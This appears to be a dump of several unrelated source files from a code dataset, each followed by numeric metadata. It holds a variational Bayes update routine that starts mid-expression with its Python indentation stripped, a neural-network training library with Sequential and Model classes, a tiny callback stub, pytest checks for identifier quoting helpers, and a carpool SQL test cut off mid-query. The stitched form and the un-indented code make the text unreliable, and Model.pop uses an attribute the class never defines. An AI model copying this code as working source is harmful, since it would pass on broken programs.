(zeta2 * np.trace(np.dot(np.outer(y_tilde_il, y_tilde_il), axis_cov[l][i, :, :])))
def _update_scale_axis_central_moment2(self, posterior, stats):
qd = posterior
axis_cov = stats.axis_cov
for l in range(self.n_regions):
for i in range(self.n_basis):
term_ = axis_cov[l][i, :, :] - np.dot(axis_cov[l][i, :, :], axis_cov[l][i, :, :])
zeta2 = qd.scale_mean_zeta[l][i]**2
y_tilde_il = qd.scale_mean_y_tilde[l][:, i]
yy_tilde = np.outer(y_tilde_il, y_tilde_il)
self.scale_axis_central_moment2[l][i] = (1/qd.scale_precision[l][i]) + \
(zeta2 * np.trace(np.dot(yy_tilde, term_)))
def update_noise(self, posterior):
qd = posterior
if qd.noise_region_specific is True:
for l in range(self.n_regions):
self.noise_mean[l] = qd.noise_gamma_shape[l]/qd.noise_gamma_scale[l]
self.noise_log_mean[l] = psi(qd.noise_gamma_shape[l]) - np.log(qd.noise_gamma_scale[l])
elif qd.noise_region_specific is False:
self.noise_mean = qd.noise_gamma_shape/qd.noise_gamma_scale
self.noise_log_mean = psi(qd.noise_gamma_shape) - np.log(qd.noise_gamma_scale)
else:
raise TypeError('Unsupported condition for noise_region_specific.')
def update_bias(self, posterior):
qd = posterior
if qd.bias_region_specific is True:
for l in range(self.n_regions):
self.bias_mean[l] = qd.bias_normal_mean[l]
self.bias_var[l] = qd.bias_normal_precision[l]**-1
elif qd.bias_region_specific is False:
self.bias_mean = qd.bias_normal_mean
self.bias_var = qd.bias_normal_precision**-1
else:
raise TypeError('Unsupported condition for bias_region_specific.')
def update_latent_functions(self, resolution, index_set, stats, phi_x):
# if resolution > 0:
n_samps_0 = len(index_set[0][0])
latent_f_mean = np.zeros((n_samps_0, self.dy))
latent_f_var = np.zeros(n_samps_0)
# TODO: which one?
for jp in range(resolution):
stats_jp = stats[jp]
phi_x_jp = phi_x[jp]
latent_f_mean_temp = []
latent_f_var_temp = []
for l in range(stats_jp.n_regions):
if stats_jp.bias_region_specific is True:
bias_mean = stats_jp.bias_mean[l]
bias_var = stats_jp.bias_var[l]
else:
bias_mean = stats_jp.bias_mean
bias_var = stats_jp.bias_var
n_samps = phi_x_jp[l].shape[0]
sum_term_mean = np.zeros((n_samps, stats_jp.dy))
sum_term_var = np.zeros(n_samps)
for i in range(self.n_basis):
sum_term_mean += stats_jp.scale_axis_mean[l][:, i] * \
np.tile(phi_x_jp[l][:, i], (self.dy, 1)).T
sum_term_var += (phi_x_jp[l][:, i]**2) * stats_jp.scale_axis_central_moment2[l][i]
latent_f_mean_temp.append(bias_mean + sum_term_mean)
latent_f_var_temp.append(bias_var + sum_term_var)
latent_f_mean += np.concatenate(latent_f_mean_temp)
latent_f_var += np.concatenate(latent_f_var_temp)
latent_f_var = np.atleast_2d(latent_f_var).T
for region in range(len(index_set[resolution])):
self.latent_f_mean[region] = latent_f_mean[index_set[resolution][region], :]
self.latent_f_var[region] = latent_f_var[index_set[resolution][region], :]
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
# ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
class SharedStats(object):
def __init__(self, posterior):
qd = posterior
self.n_basis = qd.n_basis
self.dy = qd.dy
# AXIS
        self.axis_cov = np.zeros((self.n_basis, self.dy, self.dy))
# ARD
self.ard_mean = qd.ard_gamma_shape/qd.ard_gamma_scale
self.ard_log_mean = psi(qd.ard_gamma_shape) - np.log(qd.ard_gamma_scale)
# PERMUTATION ALIGNMENT
self.omega = np.ones((self.n_basis, self.n_basis))/self.n_basis
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# :.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:..:.:
# UPDATE AXIS
def update_axis(self, posterior):
qd = posterior
for i in range(self.n_basis):
sum_d = np.zeros((self.dy, self.dy))
for d in range(self.dy):
sum_d += qd.axis_bingham_rho[i, d] * \
np.outer(qd.axis_bingham_axes[i, :, d], qd.axis_bingham_axes[i, :, d])
self.axis_cov[i, :, :] = sum_d
# UPDATE ARD
def update_ard(self, posterior):
qd = posterior
self.ard_mean = qd.ard_gamma_shape/qd.ard_gamma_scale
self.ard_log_mean = psi(qd.ard_gamma_shape) - np.log(qd.ard_gamma_scale)
def update_omega(self, prior, stats):
b_prime = prior.axis_bingham_b
log_const_prime = prior.axis_bingham_log_const
axis_cov = stats.axis_cov
ard_shape_prime = prior.ard_gamma_shape
ard_scale_prime = prior.ard_gamma_scale
ard_log_mean = stats.ard_log_mean
ard_mean = stats.ard_mean
self.omega = self._get_omega(b_prime, log_const_prime, ard_shape_prime, ard_scale_prime,
axis_cov, ard_log_mean, ard_mean, self.n_basis)
# UPDATE PERMUTATION
@staticmethod
def _get_omega(B_prime, log_const_prime, ard_shape_prime, ard_scale_prime, axis_cov, ard_log_mean,
ard_mean, n_basis):
log_omega_hat = np.zeros((n_basis, n_basis))
for i in range(n_basis):
for k in range(n_basis):
term1 = np.trace(np.dot(axis_cov[i, :, :], B_prime[k, :, :]))
log_omega_hat[i, k] = term1 - log_const_prime[k] \
+ ard_shape_prime[k]*np.log(ard_scale_prime[k]) - gammaln(ard_shape_prime[k]) \
+ (ard_shape_prime[k] - 1)*ard_log_mean[i] \
- ard_scale_prime[k] * ard_mean[i]
ln_eta_hat = fsolve(_func_omega, np.zeros(2*n_basis), log_omega_hat)
omega = np.zeros((n_basis, n_basis))
for i in range(n_basis):
ln_alpha_hat = ln_eta_hat[0:n_basis]
ln_beta_hat = ln_eta_hat[n_basis: 2*n_basis]
for k in range(n_basis):
omega[i, k] = np.exp(ln_alpha_hat[i] + ln_beta_hat[k] + log_omega_hat[i, k])
return omega
def _func_omega(ln_eta, ln_omega):
n_basis = ln_omega.shape[0]
ln_alpha = ln_eta[0:n_basis]
ln_beta = ln_eta[n_basis: 2*n_basis]
ln_a = []
for k in range(n_basis):
ln_a_k = np.zeros(n_basis)
for i in range(n_basis):
ln_a_k[i] = ln_alpha[i] + ln_omega[i, k]
ln_a.append(ln_a_k)
ln_b = []
for i in range(n_basis):
ln_b_i = np.zeros(n_basis)
for k in range(n_basis):
ln_b_i[k] = ln_beta[k] + ln_omega[i, k]
ln_b.append(ln_b_i)
out = []
for l in range(n_basis):
out.append(ln_alpha[l] + logsumexp(ln_b[l]))
out.append(ln_beta[l] + logsumexp(ln_a[l]))
return out
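As a self-contained illustration of the moment that update_axis accumulates, the snippet below builds E[w w^T] as a rho-weighted sum of outer products of toy orthonormal axes; the weights and axes are example values, not model output.

# Toy illustration of the axis covariance accumulated in ``update_axis``:
# E[w w^T] = sum_d rho_d * a_d a_d^T, with the weights summing to one.
import numpy as np

dy = 3
rho = np.array([0.6, 0.3, 0.1])                    # example per-direction weights
axes = np.linalg.qr(np.random.randn(dy, dy))[0]    # columns form an orthonormal basis

cov = np.zeros((dy, dy))
for d in range(dy):
    cov += rho[d] * np.outer(axes[:, d], axes[:, d])

# With orthonormal axes and weights summing to one, the trace of the moment is one.
assert np.isclose(np.trace(cov), 1.0)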
| 43.306695
| 108
| 0.567254
| 2,781
| 20,051
| 3.756562
| 0.046027
| 0.026802
| 0.036853
| 0.037906
| 0.913564
| 0.894898
| 0.885039
| 0.877668
| 0.858524
| 0.853068
| 0
| 0.005117
| 0.278689
| 20,051
| 462
| 109
| 43.400433
| 0.717209
| 0.065882
| 0
| 0.802228
| 0
| 0
| 0.022915
| 0.006853
| 0
| 0
| 0
| 0.002165
| 0
| 1
| 0.072423
| false
| 0
| 0.011142
| 0
| 0.097493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8dc47ec5b9d6ab433a154ef1dd25f32a073f7f13
| 21,006
|
py
|
Python
|
models.py
|
eLeVeNnN/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 24
|
2019-08-19T08:57:50.000Z
|
2020-07-06T06:31:38.000Z
|
models.py
|
E1eveNn/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 1
|
2019-08-24T02:56:30.000Z
|
2019-08-24T02:56:30.000Z
|
models.py
|
E1eveNn/shinnosuke
|
0e07273991fbf6231aea084f490826883f562d0e
|
[
"MIT"
] | 1
|
2020-04-22T18:53:52.000Z
|
2020-04-22T18:53:52.000Z
|
from .utils.Objectives import get_objective
from .utils.Optimizers import get_optimizer
from .utils.MiniBatch import get_batches
import time
import matplotlib.pyplot as plt
import os
import pickle
class Sequential():
def __init__(self,layers=None):
self.layers=[] if layers is None else layers
self.train_loss=[]
self.train_acc=[]
self.valid_loss=[]
self.valid_acc=[]
self.process_bar_nums=30
self.process_bar_trained='='
self.process_bar_untrain='*'
def add(self,layer):
self.layers.append(layer)
def compile(self,optimizer,loss):
assert self.layers
trainable_variables=[]
# self.layers[0].first_layer=True
next_layer=None
for layer in self.layers:
layer.connect(next_layer)
next_layer=layer
for var in layer.variables:
if var.require_grads:
trainable_variables.append(var)
self.trainable_variables=trainable_variables
self.loss=get_objective(loss)
self.optimizer=get_optimizer(optimizer)
def fit(self,X,Y,batch_size=64,epochs=20,shuffle=True,validation_data=None,validation_ratio=0.1,draw_acc_loss=False,draw_save_path=None):
if validation_data is None:
if 0.<validation_ratio<1.:
split=int(X.shape[0]*validation_ratio)
valid_X,valid_Y=X[-split:],Y[-split:]
train_X,train_Y=X[:-split],Y[:-split]
validation_data=(valid_X,valid_Y)
else:
train_X, train_Y = X, Y
else:
valid_X, valid_Y=validation_data
train_X,train_Y=X,Y
for epoch in range(epochs):
mini_batches=get_batches(train_X,train_Y,batch_size,epoch,shuffle)
batch_nums=len(mini_batches)
training_size=train_X.shape[0]
batch_count=0
trained_nums=0
print('\033[0;31m Epoch[%d/%d]' % (epoch + 1, epochs))
start_time = time.time()
for xs,ys in mini_batches:
batch_count+=1
trained_nums+=xs.shape[0]
#forward
y_hat=self.predict(xs)
#backward
self.layers[-1].grads = self.loss.backward(y_hat, ys)
for layer in reversed(self.layers):
layer.backward()
end_time = time.time()
gap = end_time - start_time
self.optimizer.update(self.trainable_variables)
batch_acc, batch_loss = self.__evaluate(y_hat, ys)
self.train_loss.append(batch_loss)
self.train_acc.append(batch_acc)
if validation_data is not None:
valid_acc, valid_loss = self.evaluate(valid_X, valid_Y,batch_size=batch_size)
self.valid_loss.append(valid_loss)
self.valid_acc.append(valid_acc)
if draw_acc_loss:
if len(self.train_loss)==2:
plt.ion()
plt.figure(figsize=(6, 7))
plt.title('batch-size='+str(batch_size)+',Epochs='+str(epochs))
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2)
if len(self.train_loss)>1:
self.draw_training(ax1,ax2,draw_save_path,epoch)
trained_process_bar_nums=batch_count*self.process_bar_nums//batch_nums
process_bar=self.process_bar_trained*trained_process_bar_nums+'>'+self.process_bar_untrain*(self.process_bar_nums-trained_process_bar_nums-1)
if validation_data is not None:
print(
'\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} -val_loss: {:.4f} -val_acc: {:.4f}'.format(trained_nums, training_size, process_bar, gap, gap*1000 / batch_count,batch_loss, batch_acc, valid_loss, valid_acc), end='')
else:
print('\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} '.format( trained_nums, training_size, process_bar, gap, gap * 1000 / batch_count,batch_loss, batch_acc), end='')
print()
def predict(self,X,is_training=True):
self.layers[0].input_tensor=X
for layer in self.layers:
layer.forward(is_training=is_training)
y_hat=self.layers[-1].output_tensor
return y_hat
def __evaluate(self,y_hat,y_true):
acc = self.loss.calc_acc(y_hat,y_true)
base_loss = self.loss.calc_loss(y_hat, y_true)
return acc,base_loss
def evaluate(self, X, Y, batch_size=None):
if batch_size is not None:
assert type(batch_size) is int
ep = 0
acc_list = []
loss_list = []
data_nums = X.shape[0]
while True:
sp = ep
ep = min(sp + batch_size, data_nums)
y_hat = self.predict(X[sp:ep], is_training=False)
acc = self.loss.calc_acc(y_hat,Y[sp:ep])
acc_list.append(acc)
base_loss = self.loss.calc_loss(y_hat, Y[sp:ep])
loss_list.append(base_loss)
if ep == data_nums:
acc = sum(acc_list) / len(acc_list)
base_loss = sum(loss_list) / len(loss_list)
break
else:
y_hat = self.predict(X, is_training=False)
acc = self.loss.calc_acc(y_hat,Y)
base_loss = self.loss.calc_loss(y_hat, Y)
regular_loss = 0
# for layer in self.layers:
# regular_loss+=layer.add_loss
return acc, base_loss
def draw_training(self,ax1,ax2,draw_save_path,epoch):
leg1=ax1.get_legend()
ax1.plot(self.train_loss, color='blue', label='train')
if self.valid_loss:
ax1.plot(self.valid_loss, color='green', label='validation')
ax1.set_xlabel('iter')
ax1.set_ylabel('loss')
if leg1 is None:
ax1.legend(loc='best')
leg2 = ax2.get_legend()
ax2.plot(self.train_acc, color='red', label='train')
if self.valid_acc:
ax2.plot(self.valid_acc, color='yellow', label='validation')
ax2.set_xlabel('iter')
ax2.set_ylabel('acc')
if leg2 is None:
ax2.legend(loc='best')
plt.pause(0.1)
if draw_save_path is not None:
            assert isinstance(draw_save_path, str)
            draw_save_path=os.path.abspath(os.path.join(draw_save_path,'Epoch'+str(epoch)))
plt.savefig(draw_save_path,dpi=300)
    def pop(self,index=-1):
        layer=self.layers.pop(index)
        print('successfully deleted %s layer'%(layer.__class__.__name__))
        del layer
def save(self,save_path):
with open(save_path+'.pkl','wb') as f:
pickle.dump([self.layers,self.optimizer,self.loss],f)
def load(self,model_path):
with open(model_path + '.pkl', 'rb') as f:
layers,optimizer,loss = pickle.load(f)
self.layers=layers
self.optimizer=optimizer
self.loss=loss
def __str__(self):
bar_nums = 75
print('*' * bar_nums)
print('Layer(type)'.ljust(20),'Output Shape'.ljust(20) ,'Param'.ljust(12),'Connected to'.ljust(15))
print('#' * bar_nums)
total_params = 0
for layer in self.layers:
if layer.name is not None:
layer_name = '%s (%s)'%(layer.name,layer.__class__.__name__)
else:
layer_name = str(layer.__class__.__name__)
params = layer.params_count()
total_params += params
first = True
if layer.inbounds:
for prev_layer in layer.inbounds:
if prev_layer.name is not None:
connected = prev_layer.name
else:
connected = prev_layer.__class__.__name__
if first:
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
first = False
else:
print(''.ljust(20),''.ljust(20), ''.ljust(12),connected.ljust(15))
else:
connected = '\n'
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
print('-' * bar_nums)
print('*' * bar_nums)
trainable_params = 0
for v in self.trainable_variables:
trainable_params += v.output_tensor.size
params_details = 'Total params: %d\n'%(total_params)
params_details += 'Trainable params: %d\n'%(trainable_params)
params_details += 'Non-trainable params: %d\n' % (total_params-trainable_params)
return params_details
class Model():
def __init__(self, inputs=None,outputs=None):
self.inputs=inputs
self.outputs=outputs
self.train_loss = []
self.train_acc = []
self.valid_loss = []
self.valid_acc = []
self.process_bar_nums = 30
self.process_bar_trained = '='
self.process_bar_untrain = '*'
def topological_sort(self,input_layers,mode='forward'):
"""
Sort generic nodes in topological order using Kahn's Algorithm.
`feed_dict`: A dictionary where the key is a `Input` node and the value is the respective value feed to that node.
Returns a list of sorted nodes.
"""
G = {}
graph = []
if mode=='forward':
trainable_variables=[]
layers = [input_layers]
while len(layers) > 0:
n = layers.pop(0)
if n not in G:
G[n] = {'in': set(), 'out': set()}
for m in n.outbound_layers:
for var in m.variables:
if var.require_grads and var not in trainable_variables:
trainable_variables.append(var)
if m not in G:
G[m] = {'in': set(), 'out': set()}
G[n]['out'].add(m)
G[m]['in'].add(n)
layers.append(m)
S = set([input_layers])
while len(S) > 0:
n = S.pop()
graph.append(n)
for m in n.outbound_layers:
G[n]['out'].remove(m)
G[m]['in'].remove(n)
# if no other incoming edges add to S
if len(G[m]['in']) == 0:
S.add(m)
return graph, trainable_variables
elif mode=='backward':
layers = [input_layers]
while len(layers) > 0:
n = layers.pop(0)
if n not in G:
G[n] = {'in': set(), 'out': set()}
for m in n.inbounds:
if m not in G:
G[m] = {'in': set(), 'out': set()}
G[n]['out'].add(m)
G[m]['in'].add(n)
layers.append(m)
S = set([input_layers])
while len(S) > 0:
n = S.pop()
graph.append(n)
for m in n.inbounds:
G[n]['out'].remove(m)
G[m]['in'].remove(n)
# if no other incoming edges add to S
if len(G[m]['in']) == 0:
S.add(m)
return graph
def compile(self, optimizer, loss):
assert self.inputs is not None and self.outputs is not None
self.forward_graph,self.trainable_variables=self.topological_sort(self.inputs,mode='forward')
self.backward_graph=self.topological_sort(self.outputs,mode='backward')
self.loss = get_objective(loss)
self.optimizer = get_optimizer(optimizer)
def fit(self, X, Y, batch_size=64, epochs=20, shuffle=True, validation_data=None, validation_ratio=0.1,draw_acc_loss=False, draw_save_path=None):
if validation_data is None:
if 0. < validation_ratio < 1.:
split = int(X.shape[0] * validation_ratio)
valid_X, valid_Y = X[-split:], Y[-split:]
train_X, train_Y = X[:-split], Y[:-split]
validation_data = (valid_X, valid_Y)
else:
train_X, train_Y = X, Y
else:
valid_X, valid_Y = validation_data
train_X, train_Y = X, Y
for epoch in range(epochs):
mini_batches = get_batches(train_X, train_Y, batch_size, epoch, shuffle)
batch_nums = len(mini_batches)
training_size = train_X.shape[0]
batch_count = 0
trained_nums=0
print('\033[0;31m Epoch[%d/%d]' % (epoch + 1, epochs))
start_time = time.time()
for xs, ys in mini_batches:
batch_count += 1
trained_nums += xs.shape[0]
# forward
y_hat = self.predict(xs)
#backward
self.calc_gradients(y_hat,ys)
end_time = time.time()
gap = end_time - start_time
self.optimizer.update(self.trainable_variables)
batch_acc, batch_loss = self.__evaluate(y_hat, ys)
self.train_loss.append(batch_loss)
self.train_acc.append(batch_acc)
if validation_data is not None:
valid_acc, valid_loss = self.evaluate(valid_X, valid_Y,batch_size=batch_size)
self.valid_loss.append(valid_loss)
self.valid_acc.append(valid_acc)
if draw_acc_loss:
if len(self.train_loss) == 2:
plt.ion()
plt.figure(figsize=(6, 7))
plt.title('batch-size=' + str(batch_size) + ',Epochs=' + str(epochs))
ax1 = plt.subplot(2, 1, 1)
ax2 = plt.subplot(2, 1, 2)
if len(self.train_loss) > 1:
self.draw_training(ax1, ax2, draw_save_path, epoch)
trained_process_bar_nums = batch_count * self.process_bar_nums // batch_nums
process_bar = self.process_bar_trained * trained_process_bar_nums + '>' + self.process_bar_untrain * ( self.process_bar_nums - trained_process_bar_nums - 1)
if validation_data is not None:
print( '\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} -val_loss: {:.4f} -val_acc: {:.4f}'.format(trained_nums,training_size,process_bar, gap, gap*1000/batch_count,batch_loss, batch_acc, valid_loss, valid_acc), end='')
else:
print('\r{:d}/{:d} [{}] -{:.0f}s -{:.0f}ms/batch -batch_loss: {:.4f} -batch_acc: {:.4f} '.format(trained_nums,training_size,process_bar, gap,gap*1000/batch_count, batch_loss, batch_acc), end='')
print()
def predict(self, X, is_training=True):
self.inputs.input_tensor = X
for node in self.forward_graph:
node.forward(is_training=is_training)
y_hat = self.outputs.output_tensor
return y_hat
def calc_gradients(self,y_hat,y_true):
self.outputs.grads=self.loss.backward(y_hat,y_true)
for node in self.backward_graph:
node.backward()
def __evaluate(self,y_hat,y_true):
acc = self.loss.calc_acc(y_hat,y_true)
base_loss = self.loss.calc_loss(y_hat, y_true)
return acc,base_loss
def evaluate(self, X, Y, batch_size=None):
if batch_size is not None:
assert type(batch_size) is int
ep = 0
acc_list = []
loss_list = []
data_nums = X.shape[0]
while True:
sp = ep
ep = min(sp + batch_size, data_nums)
y_hat = self.predict(X[sp:ep], is_training=False)
acc = self.loss.calc_acc(y_hat,Y[sp:ep])
acc_list.append(acc)
base_loss = self.loss.calc_loss(y_hat, Y[sp:ep])
loss_list.append(base_loss)
if ep == data_nums:
acc = sum(acc_list) / len(acc_list)
base_loss = sum(loss_list) / len(loss_list)
break
else:
y_hat = self.predict(X, is_training=False)
acc = self.loss.calc_acc(y_hat,Y)
base_loss = self.loss.calc_loss(y_hat, Y)
regular_loss = 0
# for layer in self.layers:
# regular_loss+=layer.add_loss
return acc, base_loss
def draw_training(self, ax1, ax2, draw_save_path, epoch):
leg1 = ax1.get_legend()
ax1.plot(self.train_loss, color='blue', label='train')
if self.valid_loss:
ax1.plot(self.valid_loss, color='green', label='validation')
ax1.set_xlabel('iter')
ax1.set_ylabel('loss')
if leg1 is None:
ax1.legend(loc='best')
leg2 = ax2.get_legend()
ax2.plot(self.train_acc, color='red', label='train')
if self.valid_acc:
ax2.plot(self.valid_acc, color='yellow', label='validation')
ax2.set_xlabel('iter')
ax2.set_ylabel('acc')
if leg2 is None:
ax2.legend(loc='best')
plt.pause(0.1)
if draw_save_path is not None:
            assert isinstance(draw_save_path, str)
            draw_save_path = os.path.abspath(os.path.join(draw_save_path, 'Epoch' + str(epoch)))
plt.savefig(draw_save_path, dpi=300)
    def pop(self, index=-1):
        # NOTE: Model never defines self.layers; as written this mirrors Sequential.pop
        # and only works if a ``layers`` attribute has been set on the instance.
        layer = self.layers.pop(index)
        print('successfully deleted %s layer' % (layer.__class__.__name__))
        del layer
def save(self, save_path):
with open(save_path + '.pkl', 'wb') as f:
pickle.dump([self.forward_graph, self.backward_graph, self.optimizer, self.loss], f)
def load(self, model_path):
with open(model_path + '.pkl', 'rb') as f:
f_graph, b_graph, optimizer, loss = pickle.load(f)
self.forward_graph = f_graph
self.backward_graph = b_graph
self.optimizer = optimizer
self.loss = loss
def __str__(self):
bar_nums = 75
print('*' * bar_nums)
print('Layer(type)'.ljust(20),'Output Shape'.ljust(20) ,'Param'.ljust(12),'Connected to'.ljust(15))
print('#' * bar_nums)
total_params = 0
for layer in self.forward_graph:
if layer.name is not None:
layer_name = '%s (%s)'%(layer.name,layer.__class__.__name__)
else:
layer_name = str(layer.__class__.__name__)
params = layer.params_count()
total_params += params
first = True
if layer.inbounds:
for prev_layer in layer.inbounds:
if prev_layer.name is not None:
connected = prev_layer.name
else:
connected = prev_layer.__class__.__name__
if first:
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
first = False
else:
print(''.ljust(20),''.ljust(20), ''.ljust(12),connected.ljust(15))
else:
connected = '\n'
print(layer_name.ljust(20),str(layer.output_shape).ljust(20), str(params).ljust(12),connected.ljust(15))
print('-' * bar_nums)
print('*' * bar_nums)
trainable_params = 0
for v in self.trainable_variables:
trainable_params += v.output_tensor.size
params_details = 'Total params: %d\n'%(total_params)
params_details += 'Trainable params: %d\n'%(trainable_params)
params_details += 'Non-trainable params: %d\n' % (total_params-trainable_params)
return params_details
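The topological_sort method above is an application of Kahn's algorithm to the layer graph. The standalone, dependency-free sketch below shows the same idea on a plain adjacency dictionary; the node names are illustrative.

# Standalone sketch of Kahn's algorithm over a plain adjacency dict.
from collections import deque

def kahn_topological_sort(adjacency):
    """adjacency: dict mapping node -> iterable of successor nodes."""
    indegree = {node: 0 for node in adjacency}
    for node, successors in adjacency.items():
        for succ in successors:
            indegree[succ] = indegree.get(succ, 0) + 1
    queue = deque(node for node, deg in indegree.items() if deg == 0)
    order = []
    while queue:
        node = queue.popleft()
        order.append(node)
        for succ in adjacency.get(node, ()):
            indegree[succ] -= 1
            if indegree[succ] == 0:
                queue.append(succ)
    if len(order) != len(indegree):
        raise ValueError("graph contains a cycle")
    return order

# e.g. a tiny layer graph: Input -> Dense -> Softmax
print(kahn_topological_sort({"Input": ["Dense"], "Dense": ["Softmax"], "Softmax": []}))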
| 35.483108
| 274
| 0.52466
| 2,571
| 21,006
| 4.04473
| 0.085959
| 0.01154
| 0.018463
| 0.009232
| 0.868545
| 0.860756
| 0.837965
| 0.830849
| 0.824118
| 0.824118
| 0
| 0.018685
| 0.363039
| 21,006
| 591
| 275
| 35.543147
| 0.75852
| 0.022184
| 0
| 0.856132
| 0
| 0.009434
| 0.05192
| 0
| 0
| 0
| 0
| 0
| 0.014151
| 1
| 0.058962
| false
| 0
| 0.016509
| 0
| 0.103774
| 0.061321
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30f80bae5194f798785c5a2c4e2135218f813f2f
| 39
|
py
|
Python
|
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
keyboards/inline/__init__.py
|
reeegry/youtube-parser-bot
|
475e232f80445ae6ba3e988d844b61bada6c0aed
|
[
"MIT"
] | null | null | null |
def callback_datas():
return None
| 9.75
| 21
| 0.692308
| 5
| 39
| 5.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 39
| 3
| 22
| 13
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
eb5dfe67b18cdb4f20d6da97bad44a66ee1d284b
| 697
|
py
|
Python
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 74
|
2020-04-30T09:28:15.000Z
|
2022-03-28T12:23:06.000Z
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 69
|
2020-05-06T12:29:01.000Z
|
2022-02-23T12:27:28.000Z
|
src/test/test_statement.py
|
tdamsma/alembic_utils
|
944e3a732bef1b90e5ff077b349d839d8470a4e6
|
[
"MIT"
] | 23
|
2020-05-06T12:12:36.000Z
|
2022-03-23T06:25:45.000Z
|
from alembic_utils.statement import coerce_to_quoted, coerce_to_unquoted
def test_coerce_to_quoted() -> None:
assert coerce_to_quoted('"public"') == '"public"'
assert coerce_to_quoted("public") == '"public"'
assert coerce_to_quoted("public.table") == '"public"."table"'
assert coerce_to_quoted('"public".table') == '"public"."table"'
assert coerce_to_quoted('public."table"') == '"public"."table"'
def test_coerce_to_unquoted() -> None:
assert coerce_to_unquoted('"public"') == "public"
assert coerce_to_unquoted("public") == "public"
assert coerce_to_unquoted("public.table") == "public.table"
assert coerce_to_unquoted('"public".table') == "public.table"
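coerce_to_quoted and coerce_to_unquoted are imported from alembic_utils.statement and their implementations are not shown here. The sketch below is one minimal implementation consistent with the assertions above, not the library's actual code.

# Minimal sketch consistent with the assertions above (not the library's implementation).
def coerce_to_unquoted(text: str) -> str:
    """Strip double quotes from every dotted component."""
    return text.replace('"', "")

def coerce_to_quoted(text: str) -> str:
    """Wrap every dotted component in double quotes exactly once."""
    return ".".join('"' + part.strip('"') + '"' for part in text.split("."))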
| 41
| 72
| 0.700143
| 87
| 697
| 5.275862
| 0.172414
| 0.22658
| 0.27451
| 0.217865
| 0.753813
| 0.753813
| 0.753813
| 0.753813
| 0.623094
| 0.623094
| 0
| 0
| 0.12769
| 697
| 16
| 73
| 43.5625
| 0.754934
| 0
| 0
| 0
| 0
| 0
| 0.278336
| 0
| 0
| 0
| 0
| 0
| 0.75
| 1
| 0.166667
| true
| 0
| 0.083333
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eb5e2f71c41a238447af46499bdfd6419df4c5bd
| 24,188
|
py
|
Python
|
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
db/test/test_02_submit_rider.py
|
RagtagOpen/backend
|
b5172b61f7b189632f3fa6c47e8d63bc8148da3d
|
[
"MIT"
] | null | null | null |
import pytest
import pgdb
@pytest.fixture
def pgdbConn(dbhost, db, frontenduser):
return pgdb.connect(dbhost + ':' + db + ':' + frontenduser)
def generic_rider_insert(conn, args):
cursor=conn.cursor()
cursor.execute("""
SELECT * from carpoolvote.submit_new_rider (
%(IPAddress)s,
%(RiderFirstName)s,
%(RiderLastName)s,
%(RiderEmail)s,
%(RiderPhone)s,
